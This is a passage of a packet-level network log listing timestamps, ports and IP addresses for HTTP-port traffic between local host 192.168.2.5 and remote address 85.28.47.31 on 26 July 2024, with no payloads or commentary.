Jul 26, 2024 20:09:12.645052910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645083904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.645085096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.645131111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.645143986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645154953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645164967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645174026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645185947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645195961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.645221949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.645478964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645492077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645502090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645534039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.645565987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645571947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.645576954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645586967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645596027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645606995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645615101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645618916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.645625114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645639896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.645672083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.651501894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651578903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.651688099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651699066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651751995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.651834965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651846886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651856899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651860952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651887894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.651916981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651925087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.651927948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651937008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651942015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651947021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651957035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.651983023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.652043104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.652256966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652307987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.652369022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652379036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652393103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652401924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652411938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652420998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652430058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652435064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.652440071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652498007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.652833939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652843952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652853012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652862072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652872086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652880907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652882099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.652892113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652899981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.652932882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.652968884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.728733063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.728770971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.728806019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.728856087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.728873968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.728949070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.728949070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.728969097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.728985071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729000092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729012966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729053974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729234934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729254961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729269981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729285955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729300022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729340076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729517937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729532957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729547977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729562044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729564905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729578018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729581118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729593039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729608059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729623079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729625940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729638100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729662895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729707956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729707956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.729902029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729916096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.729967117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730051041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730066061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730081081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730093956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730097055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730109930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730123997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730128050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730139017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730153084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730160952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730170965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730187893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730211973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730484962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730499983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730515003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730532885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730575085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730818033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730861902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730895996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730911016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.730953932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.730972052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731024981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731040001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731055021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731070995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731074095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731101990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731290102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731313944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731317043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731329918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731339931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731344938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731359005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731374025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731379032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731388092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731403112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731408119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731416941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731427908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731450081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731487989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731751919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731798887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731833935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731848955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731863976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731873989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731878996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731893063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731899023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731908083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.731929064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.731965065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735426903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735479116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735517025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735546112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735562086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735570908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735578060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735580921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735630989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735630989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735642910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735657930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735688925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735694885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735709906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735743046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735759020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735848904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735848904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735888004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735904932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735919952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735933065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.735943079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.735980034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736015081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736063004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736078024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736099005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736113071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736120939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736129045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736145973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736186028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736258984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736275911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736289978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736305952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736349106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736352921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736368895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736392021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736430883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736469984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736505032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736515999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736521006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736548901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736555099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736563921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.736592054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.736628056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.743591070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743613005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743638992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743649960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.743654013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743664026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743674040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743688107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.743689060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743714094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.743748903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.743782997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743798018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743813992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743824959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.743829012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743859053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743870020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.743874073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743889093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743904114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743913889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.743925095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.743952990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.743989944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.744282007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744297981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744329929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.744330883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744343996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744364023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.744391918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.744402885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744455099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.744520903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744537115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744560003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744570017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.744575024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744590998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744594097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.744606972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744611025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.744626045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.744645119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.744703054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.819750071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.819792986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.819828987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.819856882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.819881916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.819883108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.819883108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.819914103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.819930077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.819947958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.819961071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.819982052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.819993019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820031881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820056915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820105076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820107937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820137978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820157051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820171118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820188999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820204973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820223093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820238113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820256948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820271015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820317984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820333004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820394993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820427895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820451975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820461035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820466995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820513010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820530891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820564032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820584059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820597887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820617914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820651054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820668936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820702076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820720911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820735931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820749998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820768118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820794106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820802927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820811033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820852041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.820950031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.820985079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821001053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821017027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821033955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821048021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821067095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821099997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821116924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821150064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821171999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821182013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821199894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821216106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821230888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821249008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821264982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821281910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821297884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821317911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821331978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821366072 CEST	49704	80	192.168.2.5	85.28.47.31
